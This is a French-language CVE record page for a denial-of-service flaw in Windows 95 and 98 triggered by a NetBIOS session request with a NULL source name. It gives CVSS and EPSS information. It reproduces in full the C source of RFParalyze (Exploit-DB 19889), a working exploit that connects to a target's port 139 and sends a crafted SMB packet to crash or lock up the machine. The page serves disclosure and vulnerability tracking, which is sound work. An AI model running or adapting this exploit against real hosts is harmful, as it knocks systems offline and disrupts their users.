Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19889
Date de publication : 2000-05-01 22h00 +00:00
Auteur : rain forest puppy
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/1163/info
Unpredictable results, including system crashes, lock-ups, reboots, and loss of network connectivity, can occur in Windows 95/98 if a NetBIOS session packet is received with the source host name set to NULL.
/*********************************** www.el8.org **** www.wiretrip.net **/
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
- Usage: RFParalyze <IP address> <NetBIOS name>
where <IP address> is the IP address (duh) of the target (note:
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh) of
the server at the IP address given. A kiddie worth his scripts
should be able to figure out how to lookup the NetBIOS name.
Note: NetBIOS name must be in upper case.
This code was made from a reverse-engineer of 'whisper', a
binary-only exploit found in the wild.
I have only tested this code on Linux. Hey, at least it's
not in perl... ;) -rfp
*/
#include <stdio.h> /* It's such a shame to waste */
#include <stdlib.h> /* this usable space. Instead, */
#include <string.h> /* we'll just make it more */
#include <netdb.h> /* props to the men and women */
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */
#include <sys/types.h> /* #!w00w00, because they rock */
#include <netinet/in.h> /* so much. And we can't forget*/
#include <unistd.h> /* our friends at eEye or */
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */
/* Magic winpopup message
This is from \\Beav\beavis and says "yeh yeh"
Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
struct sreq /* little structure of netbios session request */
{
char first[5];
char yoname[32];
char sep[2];
char myname[32];
char end[1];
};
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf(" --IP must be ip address, not dns\n");
printf(" --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A'; /* how was Beltaine? :) */
myname[31]='D';
Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(139);
sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
perror("Problems connecting: ");
exit(1);}
memset(buf,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
memcpy(smbreq.end,"\x00",1); /*what it does :) */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);
write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000); /* get their response */
if(x<1){ printf("Problem, didn't get response\n");
exit(1);}
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
exit(1);}
write(sox,&blowup,72); /* send the magic message >:) */
x=read(sox,buf,4000); /* we really don't care, but sure */
close(sox);
printf("done\n");
}
void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A'; /* CA is a space */
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0; /* Put in the null ...*/
}
/*********************************** www.el8.org **** www.wiretrip.net **/
Products Mentioned
Configuraton 0
Microsoft>>Windows_95 >> Version *
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
- Microsoft>>Windows_95 >> Version - (Open CPE detail)
Microsoft>>Windows_98 >> Version *
- Microsoft>>Windows_98 >> Version - (Open CPE detail)
